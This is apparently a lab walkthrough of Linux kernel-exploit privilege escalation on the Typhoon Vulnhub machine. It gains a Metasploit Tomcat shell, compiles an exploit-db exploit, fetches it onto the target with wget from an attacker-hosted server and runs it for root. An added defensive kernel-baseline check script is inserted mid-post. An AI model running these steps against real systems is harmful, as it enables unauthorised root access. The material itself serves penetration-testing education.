Escalating privileges in Linux can be tough. While there are automated tools for vulnerability discovery, there are also techniques we can use to win the game.
Linux privilege escalation using kernel exploits is one of those fundamental ethical hacking techniques.
I show you how to do so using the Typhoon 1.02 vulnhub walkthrough which conveniently holds all the material I need to cover this technique!
What You Need
- Typhoon 1.02 Vulnhub Machine – VirtualBox
- Kali Linux Virtual Machine – VirtualBox
Get The Kernel Version
One command I use is the lsb_release -a command to get the correct Linux kernel version so that I can research the right exploit.
Or try these other manual commands to get the kernel version.
[kali@kali:] $ cat /etc/issue
[kali@kali:] $ cat /proc/version
Additionally, we can use another flag with the same uname command. The -r flag shows the kernel release.
taco@debian:~$ uname -r
2.6.32-5-amd64
Let’s get into this a little more.
2.6.32-5-amd64
2 = major kernel version
6 = major release version
32 = minor revision level
32-5 = level of patches and fixes installed
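The field breakdown above, turned into a check a defender can run across hosts to flag kernels below a chosen baseline. This is an added example, not code from the original post; the function names, the sample release strings and the baseline value are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post). Sample release strings and the
# baseline below are constructed for illustration.

# Leading digits of $1, or 0 if there are none ("32+" -> 32, "generic" -> 0).
num() { n=${1%%[!0-9]*}; echo "${n:-0}"; }

# Split a `uname -r` string into: major release revision patch flavour
# e.g. "2.6.32-5-amd64" -> "2 6 32 5 amd64"
parse_release() {
    ver=${1%%-*}                       # "2.6.32"
    rest=${1#"$ver"}; rest=${rest#-}   # "5-amd64" (empty if no suffix)
    major=$(num "${ver%%.*}")
    case $ver in *.*) tail=${ver#*.} ;; *) tail=0 ;; esac   # "6.32"
    minor=$(num "${tail%%.*}")
    case $tail in
        *.*) rev=$(num "${tail#*.}") ;;
        *)   rev=0 ;;                  # two-part versions such as "5.10"
    esac
    patch=$(num "$rest")               # patch level, 0 when absent
    flavour=${rest#"${rest%%[!0-9]*}"}; flavour=${flavour#[-.]}
    echo "$major $minor $rev $patch $flavour"
}

# Return 0 if release $1 is older than baseline $2 (numeric fields only).
kernel_older_than() {
    a=$(parse_release "$1"); b=$(parse_release "$2")
    for i in 1 2 3 4; do
        x=$(echo "$a" | cut -d' ' -f"$i"); y=$(echo "$b" | cut -d' ' -f"$i")
        [ "$x" -lt "$y" ] && return 0
        [ "$x" -gt "$y" ] && return 1
    done
    return 1                           # equal counts as not older
}

# Constructed baseline: flag any host reporting a release below this one.
BASELINE="3.16.0-4-amd64"
for rel in "2.6.32-5-amd64" "3.13.0-32-generic" "4.19.0-21-amd64" "$(uname -r)"; do
    if kernel_older_than "$rel" "$BASELINE"; then verdict="BELOW baseline"
    else verdict="ok"; fi
    printf '%-26s fields=[%s]  %s\n' "$rel" "$(parse_release "$rel")" "$verdict"
done
```

Distribution kernels backport fixes without changing the upstream version number, so treat a BELOW result as a prompt to check the vendor's advisory for that kernel package. The patch field is only comparable within one distribution series.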
Get Kernel Version Using Metasploit
Another way to get the kernel version is to use Metasploit.
In this case I found a Tomcat manager service running with default credentials configured.
As a result I used the Metasploit exploit multi/http/tomcat_mgr_upload, which requires credentials, and the exploit returns a meterpreter session!
Once I have that meterpreter session I can use the sysinfo command to get the Linux kernel version.
Compile The Exploit
Compiling exploits can be difficult, believe me, but luckily that is not the case here.
gcc 37292.c -o rootme.exe
Get The Exploit To The Target
I compiled the exploit, but now how do I get it to the remote target for execution so that I can escalate my low-level privileges to root?
python -m SimpleHTTPServer 8000
Then, in the shell I have on the target, I run the command below:
wget http://kali-ip:8000/rootme.exe
Run The Exploit Get Root
First I am going to change the file permissions of the exploit so that I can run it.
I have successfully run the compiled exploit for the Linux kernel version and in doing so I have escalated my privileges to root. I got the flag!
Using Dirty Cow Exploits
Sagi Shahar’s GitHub gives us a reliable vulnerable Linux machine on which to test the Dirty COW exploits.
https://www.exploit-db.com/exploits/40616